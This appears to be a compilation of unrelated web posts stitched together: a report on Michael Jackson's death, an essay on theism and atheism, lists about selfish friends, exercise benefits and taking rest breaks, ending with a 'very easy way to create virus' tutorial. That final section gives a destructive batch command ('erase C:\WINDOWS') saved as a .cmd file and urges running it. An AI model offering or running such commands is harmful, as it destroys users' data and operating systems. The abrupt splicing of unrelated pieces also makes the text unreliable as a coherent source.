Report on death of king of POP

The world has lost one of the greats, but his music will live on forever.


Michael Jackson whose brilliance as an entertainer was matched only by his eccentricity, died of cardiac arrest Thursday - as dramatically and mysteriously as he lived.

The 50-year-old music icon fell unconscious and stopped breathing at his rented home on Sunset Blvd. in Bel Air, officials said.

The cause of death is still unknown, but several British newspapers including the LondonTimes, Daily Mail and the Sun published reports Friday morning that linked the pop star's death to an injection of the painkiller Demerol, which the singer's aides told doctors he received after a round of strenuous rehearsals for his upcoming tour.

"He started to experience slow, shallow breathing," a source told the Sun.

Jackson's lawyer blamed the pop icon's sudden death on pressure from his inner circle in the weeks leading up to his planned series of comeback concerts in London, the Daily Mail reported.

The lawyer said Jackson had been taking drugs for several months as he struggled to get in shape for the physically demanding shows, the Mail reported.

Officials warned it could take several weeks to determine a cause of death due to a complex series of toxicology tests that will be performed to detect the possible presence of drugs or alchohol.

"His breathing gradually got slower and slower until it stopped. His staff started mouth-to-mouth and an ambulance was called, which got there in eight minutes."

Jackson's brother Jermaine spoke to the press Thursday night and said Michael's personal physician was with him at the time he fell ill

Theist Vs Atheist

There had always been a debate, on the existence of God. Some believe in God and some seldom or never. Both hold a factor of justice, at least to prove them or defy the opponent’s point of view. But mostly a theist’s statement is based on belief. Whilst an atheist speaks on fact as we call it, Science. All these debates continue to prevail upon on a factor, God, which has never been concluded yet.

Some say, there He is, beyond the 7 Seas, 7 Hills, above the sky and afar the place where any human can reach. He is the declaring authority. He decides and life happens. He is the factor of life. He is the one who creates, saves and destroys. Everything in and on earth relies on him. The universe may stumble upon his words so and so and what not?

Another set of people say, God? Above the Earth? Satellites could not read heavens either. What does it take for God to create, save and destroy? Creation is based on the Evolution Theory. Fact is what the world needs to look into. Science can explain the base of life. It is all done with some theory behind. And that ‘theory’ need not to be God. Man as such is the ultimate.

And the debate Continues….. Continues since ages. Yet no concrete solution on this issue was found. Nevertheless there exists one peculiar (well, if I could call it as) case. They are of the 3rd type, maybe. They say, “I don’t believe in God, since am an atheist but that does not mean God never exist!”

When I wonder about all these people and their statements, I remember a quote from Sir Einstein, “Two things are Infinite. One, the Universe and the other, the Human stupidity. And I am not sure about the Universe.” Yes, the human stupidity is infinite. I don’t think anyone, whom so ever it maybe, a theist or an atheist would have even tried to look upon the fact of the existence of the Unknown God. What plays an important role in here is again something called ‘belief’! The most powerful essence of the Human Caste. An atheist believes on science while theist believes in some eternity. But the real question is “Are we trying to find out an answer for this question?”

Two different views of two different people. Views had been and still continue to be views. Neither a theist nor an atheist is going to attain an ultimate salvation from the cycles of pressures and tensions of life by either believing or disbelieving the Almighty. As said already, they are just views or a step from the base line, which we had been discussing partially, without a correct, confident statement and without an ultimate solution for past hundreds of decades.

Unless and until we start trying to find out the truth behind the screens, I think there is no point in arguing about the Eternity. “To start trying to find out the truth??” What can that be? Well, it literally means, accepting that we don’t know anything about the existence of any God. Think!! An atheist cannot prove the non-existence of God while theist cannot prove the existence of God. That ultimately means both the groups don’t know the fact. When we don’t know the fact, the best thing we can ever do is to accept that we don’t know it. When we are sure that we don’t know the truth, automatically a spirit to find the answer comes up. When that comes ….. “Do you think I have to continue more…? “

  1. Friends who come close only when they are depressed

This type of friend comes close only when they are depressed. This also means that they do not interact with you even if you want to ask for some guidance or help. For such friends, your good qualities that they can use in order to become happy or happier or distracted, tend to be the only friendly aspect they wish to see in you.

Whether or not such friends realize their behavior, you can get used because of their narrow-mindedness. There is nothing wrong with being down and needing help, whether emotionally, mentally or physically. However, there is something seriously wrong with making sure that friends are only needed when you are depressed, and not appreciated on purpose when you are not depressed.

  1. Friends who come close only when you agree with them

This type of friends wants everyone to agree with them. There cannot be disagreements or ignoring any topic, and if you disagree, you will be treated differently.

Handling such friends can be tricky, since handling friends overall is tricky enough by itself. How do you convince someone to still respect you and still act 100% when you disagree about something with them? Whether it is something related to business or a personal opinion about a personal issue, these friends wants everyone to agree with them. They will not show such a behavior easily, and anytime they accept disagreements or different options, they will brag about such a behavior. However, when they cannot control themselves anymore, they will hate you and not respect your friendship simply because you disagree about anything that they support, or vice versa.

  1. Friends who go away when you try to pinpoint issues

This type of friends cannot hear any form of issues or problems with anything, even if such issues and problems may be affecting the friendship. Many of such friends love pointing issues themselves, but if you point them, they act weird.

Many times, two friends can be completely different. That is why if one is acting in a manner that is affect the other one negatively, it is better to bring up the issue somehow in order to address it. However, your friend might simply act distant or unresponsive if you bring up the issue even in the most respectful and light manner. If you try to bring an issue, they will become defensive or try to act rude by not focusing on the friendship aspect of things.

  1. Friends who act stubborn and righteous all the time

These types of friend want to be right all the time. They are also opposed to realizing that some problem may be because of their own actions or thoughts. Many of such friends also love to point issues with others all the time, similar to the #4 type of friends above, while not accepting the fact that maybe they themselves may not be right about something.

Such supposed friends act immature many times by not actually acting like monkeys, but through their changed behavior regarding many things. This can be mainly because of being spoiled in many ways, and they do not realize it. They had rather tell others all the time what is wrong with others instead of realizing any problem in their own self.

  1. Friends who hate some things about you unethically and let that hate affect their interaction with you

This can be one of the most complicated types of friends. You may have a friend who hates something about you unethically, like your race, background, your way of doing things, and because of that hate, such people will let the friendship be affected all the time, or whenever such friends feel moody.

How do we know when a friend discriminates? How do we know when a friend has racist bias against you? How do we know when a friend hates you for something like your background, your name, your gender, your sex, your job, or something else? Such questions can bother your mind when it comes to realizing why a friend is acting in a certain manner. Such questions plague me regularly when it comes to some friends I know.

There you have it. The above are 5 signs of selfish or narrow-minded friends that can affect you negatively directly and indirectly through the friendship.

Research has confirmed that any amount of exercise, at any age, is beneficial. And, in general, the more you do, the greater the benefits. The National Academy of Sciences has recommended that everyone strive for a total of an hour per day of physical activity. Sounds like a lot, but the hour can be made up of several shorter bursts of activity (it can be walking, gardening, even heavy housecleaning) done throughout the day.

Physical activity is an essential part of any weight-loss program, to maximize your fat loss while keeping valuable muscle mass. But exercise has many other health and longevity benefits. It can help prevent or improve these conditions:

1. Heart Disease. Regular activity strengthens your heart muscle; lowers blood pressure; increases "good" cholesterol (high-density lipoproteins or HDLs) and lowers "bad" cholesterol (low-density lipoproteins or LDLs); enhances blood flow; and helps your heart function more efficiently. All of these benefits reduce the risk of stroke, heart disease, and high blood pressure.

Researchers at Duke University suggest that the amount of physical activity, rather than its intensity, has the biggest impact on improving blood lipids (cholesterol). According to The New England Journal of Medicine, these researchers also found that any exercise is better than none -- although more is better.

2. Stroke. In an analysis of 23 studies, researchers found that being active reduces your risk of having and dying from a stroke. According to a study published in the journal Stroke, moderately active study participants had 20% less risk of stroke than less active participants.

3. Type II Diabetes. This disease is increasing at alarming rates -- by 62% since 1990 -- and 17 million Americans now have it. Physical activity can enhance weight loss and help prevent and/or control this condition. Losing weight can increase insulin sensitivity, improve blood sugar and cholesterol levels, and reduce blood pressure -- all of which are very important to the health of people with diabetes.

In a study published in the Annals of Internal Medicine, Frank Hu, MD, of the Harvard School of Public Health found that a brisk walk for one hour daily could reduce the risk of type II diabetes by 34%.

4. Obesity. Overweight and obese conditions can be prevented or treated with exercise along with a healthy diet. Activity helps to reduce body fat and increase muscle mass, thus improving your body's ability to burn calories. The combination of reduced calories and daily exercise is the ticket to weight loss. And controlling obesity is critical, as it is a major risk factor for many diseases. Lowering your body mass index (BMI) is a sure way to reduce your risk of dying early and to live a healthier life.

5. Back Pain. Back pain can be managed or prevented with a fitness program that includes muscle strengthening and flexibility. Having good posture and a strong abdomen is the body's best defense against back pain.

6. Osteoporosis. Weight-bearing exercise (such as walking, jogging, stair climbing, dancing, or lifting weights) strengthens bone formation and helps prevent the osteoporosis or bone loss often seen in women after menopause. Combine a diet rich in calcium and vitamin D with regular weight-bearing exercise for maximum results.

According to The Journal of the American Medical Association, data from the Nurses' Health Study showed that women who walked four or more hours per week had 41% fewer hip fractures than those who walked less than an hour a week.

7. Psychological Benefits. Improved self-esteem is one of the top benefits of regular physical activity. While exercising, your body releases chemicals called endorphins that can improve your mood and the way you feel about yourself. The feeling that follows a run or workout is often described as "euphoric" and is accompanied by an energizing outlook. Exercise can help you cope with stress and ward off depression and anxiety.

And these are just a few of the ways exercise improves your health. Studies have suggested it can also help with certain types of cancer, improve immune function, and more.

Here are some signs you should take a break and recover your energies:

1. You’ve just finished a major task
I’m against breaking in-between work. That breaks the flow of concentration that would otherwise be helpful in completing a task. Once you’ve completed a big task (writing an essay, emptying your inbox, etc.) giving yourself a few minutes to rest can be useful.

2. You’ve been working hard
Look back at the last few days. Ask yourself whether you have been more or less productive than your average. Taking a day off after several highly productive days can be useful. But resting after three days of accomplishing nothing will probably only make your procrastination worse.

3. You need to switch gears
I often write several articles at once, but I usually take a small break in-between. Taking a break during a task is wasteful because you interrupt the natural thinking flow of work. But if you need to start a new task, you may have to interrupt that flow anyways. Look for logical breaks in your work to plan out rest times.

4.Plan Daily and Weekly Goals

The best method to avoid burnout and laziness is by using a quota. Simply set for yourself all the tasks you want to accomplish in the week and day. When these tasks are done, you can use any time left over to rest.

5. Keep Work and Play Separate
Although I’m not perfect in application, I strive to follow the “work hard, play hard” mantra. This means that when you allocate time for working on big projects, you focus entirely on that for a set period of time. The time you have remaining is yours to use however you like. This removes the guilt during rest periods and urge to procrastinate during work periods.

6. Keep a Varied Lifestyle
Focusing all of your energies onto just one task can be useful, for a short time. But having diversified interests can keep you emotionally balanced and your energies high. If work is your only pursuit, it can be easy to burnout. Having other hobbies, social activities and interests to occupy your time can be helpful in staying productive while resting.

7. Have “Lazy” Days
I put “lazy” in quotations because the end result is often the opposite. Having days where you try to do things as slowly as possible can keep you focused on the days when tasks threaten to overwhelm you.

8. The 20% Rule
Not to be confused with the 80/20 Rule, this is a rule that is useful for building self-discipline or overcoming your fears. Put simply, the 20% rule states that you notice when you first feel a strong urge to give up. You then commit to go 20% further before taking a long break. This helps smooth over temporary feelings of laziness and builds your internal discipline.

9. Have a Motivation Refuel
Physical fatigue isn’t the only threat to your energy. Emotional fatigue in the form of rejections, disappointments or making mistakes can all dampen your motivation. Having a motivation refuel means having a day, hour or even a few minutes where you go over your goals, listen to motivational tapes, meditate or do whatever will recharge your drive.

10. Don’t Rely on Substances
I don’t drink coffee. Occasionally I’ll drink caffeinated tea, but never as a performance drug. Yet, I see many people who rely on their triple-espresso as a crutch to just get through the day.

This isn’t a lecture about heath consequences, but about productivity. Your body can’t maintain an artificial source of energy, so if you constantly use stimulants to keep yourself going, you’ll lose the natural ability to tell what your energy levels are. Try going without caffeine for a month (or cut back your usage or switch to teas) and see what effect it has.

11. Productivity Benchmarks
Monitor how much work you can do over an average day, week or month. This sets a productivity benchmark that can allow you to decide where to set hourly, daily and weekly goals. By lining up your quotas with a productivity benchmark, you can avoid feeling guilty about taking a rest when you truly need one.


You CAN overcome laziness without becoming a workaholic. All it takes is organization, self control and a bit of motivation.

Very easy way to create virus but DANGEROUS

Ok, now the trick:

The only thing u need is a notepad.

Now to test it, create a file a text file document called SAMPLE.txt (empty) in C:\

Now in desktop create another notepad and type “erase C:\SAMPLE.txt” (without the quotes)… Then do “save as.. “ and then save it as

SAMPLE.cmd……. Now run the file “SAMPLE.cmd” file.. and then go to C:\ and u ll see ur SAMPLE.txt is gone.. Now the real work begins

Go to notepad and type “erase C:\WINDOWS” (without quotes) and save it as “Anyname.cmd” Now run the file or you will lose the windows map… So that is the virus….
